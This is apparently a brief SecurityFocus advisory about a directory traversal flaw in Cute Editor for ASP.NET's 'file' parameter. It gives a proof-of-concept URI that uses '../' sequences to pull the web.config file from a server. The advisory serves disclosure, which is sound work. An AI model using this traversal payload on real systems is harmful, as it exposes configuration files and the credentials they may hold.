Cute Editor for ASP.NET 'file' Parameter Directory Traversal Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config


 

Privacy Statement
Copyright 2010, SecurityFocus